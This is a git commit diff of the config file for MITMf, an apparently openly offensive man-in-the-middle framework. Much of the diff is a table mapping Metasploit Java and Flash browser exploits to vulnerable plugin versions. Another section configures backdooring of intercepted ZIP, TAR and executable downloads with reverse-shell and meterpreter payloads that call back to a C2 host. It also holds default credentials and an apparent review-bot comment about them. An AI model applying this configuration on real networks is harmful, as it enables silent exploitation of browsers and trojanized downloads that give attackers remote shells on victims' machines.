mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-08-21 05:53:30 -07:00
This commit is just to push the changes so far to github , still have to tidy things up here and there and fix some bugs (also I really hate javascript)
JavaPwn plugin has been renamed to BrowserSniper (cause it now supports java, flash and browser exploits); it's been completely re-written along with its config file section. Addition of the screenshotter plugin: currently there is a bug when decoding the base64 encoded png files (a very weird one), but other than that it works (did i mention i hate js?). Jskeylogger's javascript now works on every browser except FF mobile (have no clue what's with that). p.s. did i mention i hate JS? Plugins that deal with javascript now read it from a file as opposed to having it built in (encoding issues). fu javascript. User agent parsing is now built in and handled by core/httpagentparser.py; this is because the user-agent library is a pain to install on some distros. It also removes 3-4 deps, which is a plus. also fuck javascript
parent
86870b8b72
commit
ff39a302f9
32 changed files with 4378 additions and 681 deletions
|
@ -18,7 +18,8 @@
|
|||
pass = beef
|
||||
|
||||
[[Metasploit]]
|
||||
msfport = 8080 #Port to start webserver for exploits
|
||||
|
||||
msfport = 8080 #Port to start Metasploit's webserver on that will host exploits
|
||||
rpcip = 127.0.0.1
|
||||
rpcpass = abc123
|
||||
|
||||
|
@ -231,37 +232,90 @@
|
|||
skip_in_mass_poison=1
|
||||
#you can add other scripts in additional sections like jQuery etc.
|
||||
|
||||
[BrowserPwn]
|
||||
[BrowserSniper]
|
||||
#
|
||||
# Currently only supports java, flash and browser exploits
|
||||
#
|
||||
# The version strings were pulled from http://www.cvedetails.com
|
||||
#
|
||||
# When adding java exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
|
||||
#
|
||||
|
||||
#
|
||||
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
|
||||
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
|
||||
#
|
||||
[[multi/browser/java_rhino]] #Exploit's MSF path
|
||||
|
||||
Type = PluginVuln #Can be set to PluginVuln, BrowserVuln
|
||||
OS = Any #Can be set to Any, Windows or Windows + version (e.g Windows 8.1)
|
||||
|
||||
[[Multi]] #Cross platform exploits, yay java! <3
|
||||
Browser = Any #Can be set to Any, Chrome, Firefox, IE or browser + version (e.g IE 6)
|
||||
Plugin = Java #Can be set to Java, Flash (if Type is BrowserVuln will be ignored)
|
||||
|
||||
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
|
||||
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
|
||||
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
|
||||
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
|
||||
multi/browser/java_jre17_exec = 1.7.0.6
|
||||
multi/browser/java_jre17_jaxws = 1.7.0.7
|
||||
multi/browser/java_jre17_jmxbean = 1.7.0.10
|
||||
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
|
||||
multi/browser/java_jre17_reflection_types = 1.7.0.17
|
||||
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
|
||||
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
|
||||
multi/browser/java_jre17_method_handle = 1.7.0.7
|
||||
multi/browser/java_jre17_driver_manager = 1.7.0.17
|
||||
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
|
||||
multi/browser/java_storeimagearray = 1.7.0.21
|
||||
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
|
||||
#An exact list of the plugin versions affected (if Type is BrowserVuln will be ignored)
|
||||
PluginVersions = 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.23, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.3, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0
|
||||
|
||||
[[Windows]] #These are windows specific
|
||||
[[multi/browser/java_atomicreferencearray]]
|
||||
|
||||
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
|
||||
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
|
||||
windows/browser/java_mixer_sequencer = 1.6.0.18
|
||||
Type = PluginVuln
|
||||
OS = Any
|
||||
Browser = Any
|
||||
Plugin = Java
|
||||
PluginVersions = 1.5.0, 1.5.0.1, 1.5.0.10, 1.5.0.11, 1.5.0.12, 1.5.0.13, 1.5.0.14, 1.5.0.15, 1.5.0.16, 1.5.0.17, 1.5.0.18, 1.5.0.19, 1.5.0.2, 1.5.0.20, 1.5.0.21, 1.5.0.22, 1.5.0.23, 1.5.0.24, 1.5.0.25, 1.5.0.26, 1.5.0.27, 1.5.0.28, 1.5.0.29, 1.5.0.3, 1.5.0.31, 1.5.0.33, 1.5.0.4, 1.5.0.5, 1.5.0.6, 1.5.0.7, 1.5.0.8, 1.5.0.9, 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.29, 1.6.0.3, 1.6.0.30, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0, 1.7.0.1, 1.7.0.2
|
||||
|
||||
[[multi/browser/java_jre17_jmxbean_2]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Any
|
||||
Browser = Any
|
||||
Plugin = Java
|
||||
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
|
||||
|
||||
[[multi/browser/java_jre17_reflection_types]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Any
|
||||
Browser = Any
|
||||
Plugin = Java
|
||||
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
|
||||
|
||||
[[multi/browser/java_verifier_field_access]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Any
|
||||
Browser = Any
|
||||
Plugin = Java
|
||||
PluginVersions = 1.4.2.37, 1.5.0.35, 1.6.0.32, 1.7.0.4
|
||||
|
||||
[[multi/browser/java_jre17_provider_skeleton]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Any
|
||||
Browser = Any
|
||||
Plugin = Java
|
||||
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.21, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
|
||||
|
||||
|
||||
[[exploit/windows/browser/adobe_flash_pcre]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Windows
|
||||
Browser = Any
|
||||
Plugin = Flash
|
||||
PluginVersions = 11.2.202.440, 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296
|
||||
|
||||
[[exploit/windows/browser/adobe_flash_net_connection_confusion]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Windows
|
||||
Browser = Any
|
||||
Plugin = Flash
|
||||
PluginVersions = 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 16.0.0.305
|
||||
|
||||
[[exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Windows
|
||||
Browser = Any
|
||||
Plugin = Flash
|
||||
PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144
|
||||
|
||||
[SSLstrip+]
|
||||
|
||||
|
@ -315,91 +369,93 @@
|
|||
# Tested on Kali-Linux.
|
||||
|
||||
[[ZIP]]
|
||||
# patchCount is the max number of files to patch in a zip file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
# patchCount is the max number of files to patch in a zip file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
|
||||
patchCount = 5
|
||||
patchCount = 5
|
||||
|
||||
# In Bytes
|
||||
maxSize = 40000000
|
||||
# In Bytes
|
||||
maxSize = 40000000
|
||||
|
||||
blacklist = .dll, #don't do dlls in a zip file
|
||||
blacklist = .dll, #don't do dlls in a zip file
|
||||
|
||||
[[TAR]]
|
||||
# patchCount is the max number of files to patch in a tar file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
# patchCount is the max number of files to patch in a tar file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
|
||||
patchCount = 5
|
||||
patchCount = 5
|
||||
|
||||
# In Bytes
|
||||
maxSize = 40000000
|
||||
# In Bytes
|
||||
maxSize = 40000000
|
||||
|
||||
blacklist = , # a comma is null do not leave blank
|
||||
blacklist = , # a comma is null do not leave blank
|
||||
|
||||
[[targets]]
|
||||
#MAKE SURE that your settings for host and port DO NOT
|
||||
# overlap between different types of payloads
|
||||
|
||||
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
|
||||
|
||||
LinuxType = ALL # choices: x86/x64/ALL/None
|
||||
WindowsType = ALL # choices: x86/x64/ALL/None
|
||||
FatPriority = x64 # choices: x86 or x64
|
||||
|
||||
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
||||
|
||||
CompressedFiles = True #True/False
|
||||
LinuxType = ALL # choices: x86/x64/ALL/None
|
||||
WindowsType = ALL # choices: x86/x64/ALL/None
|
||||
FatPriority = x64 # choices: x86 or x64
|
||||
|
||||
[[[[LinuxIntelx86]]]]
|
||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||
HOST = 192.168.1.168 # The C2
|
||||
PORT = 8888
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
||||
|
||||
[[[[LinuxIntelx64]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 9999
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
||||
|
||||
[[[[WindowsIntelx86]]]]
|
||||
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||
PATCH_METHOD = automatic
|
||||
HOST = 192.168.1.16
|
||||
PORT = 8443
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = False
|
||||
PATCH_DLL = True
|
||||
MSFPAYLOAD = windows/meterpreter/reverse_tcp
|
||||
CompressedFiles = True #True/False
|
||||
|
||||
[[[[LinuxIntelx86]]]]
|
||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||
HOST = 192.168.1.168 # The C2
|
||||
PORT = 8888
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
||||
|
||||
[[[[LinuxIntelx64]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 9999
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
|
||||
[[[[WindowsIntelx64]]]]
|
||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||
PATCH_METHOD = automatic
|
||||
HOST = 192.168.1.16
|
||||
PORT = 8088
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = True
|
||||
PATCH_DLL = False
|
||||
MSFPAYLOAD = windows/x64/shell/reverse_tcp
|
||||
[[[[WindowsIntelx86]]]]
|
||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||
# PATCH_METHOD = automatic
|
||||
PATCH_METHOD =
|
||||
HOST = 192.168.1.16
|
||||
PORT = 8443
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = True
|
||||
PATCH_DLL = False
|
||||
MSFPAYLOAD = windows/meterpreter/reverse_tcp
|
||||
|
||||
[[[[MachoIntelx86]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 4444
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
[[[[WindowsIntelx64]]]]
|
||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||
# PATCH_METHOD = automatic
|
||||
PATCH_METHOD =
|
||||
HOST = 192.168.1.16
|
||||
PORT = 8088
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = True
|
||||
PATCH_DLL = False
|
||||
MSFPAYLOAD = windows/x64/shell/reverse_tcp
|
||||
|
||||
[[[[MachoIntelx64]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 5555
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
[[[[MachoIntelx86]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 4444
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
|
||||
[[[[MachoIntelx64]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 5555
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
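Review bot: The first hunk touches the `[[Metasploit]]` block only to reword the `msfport` comment, and the shipped defaults next to it still carry fixed credentials: `rpcpass = abc123` here and `pass = beef` just above. Anyone who runs the tool with the stock file ends up with an RPC password that is published in the repository; `rpcip = 127.0.0.1` keeps that local, but only as long as nobody edits the address. I would ship a placeholder and say so in the comment, e.g. `rpcpass = CHANGE_ME #Set per install, must match the password configured on the Metasploit RPC side`. The section that `pass = beef` belongs to starts above the hunk, so the same change there needs checking against the full file.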
|
||||
|
|